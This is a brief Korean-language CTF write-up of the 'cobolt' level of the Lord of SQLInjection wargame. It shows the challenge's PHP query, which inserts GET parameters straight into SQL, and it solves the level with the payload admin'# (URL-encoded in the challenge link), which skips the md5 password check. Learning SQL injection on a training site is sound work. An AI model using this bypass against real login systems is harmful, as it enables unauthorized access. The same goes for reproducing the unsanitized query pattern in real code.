select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')get 방식으로 받은 변수를 위 코드에 넣어서 쿼리를 실행하고있습니다.
gremlin 단계와 달라진 점은 쿼리가 비밀번호를 md5 해시 처리하여 전송하고있고, admin으로 로그인을 해야 클리어할 수 있습니다.
id 파라미터에 admin'#를 넣어주면 주석 뒤가 무시되므로
select id from prob_cobolt where id='admin'
이런 쿼리가 실행됩니다. 아래 처럼 입력합니다.
https://los.rubiya.kr/chall/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin%27%23
cobolt 단계를 클리어 했습니다.
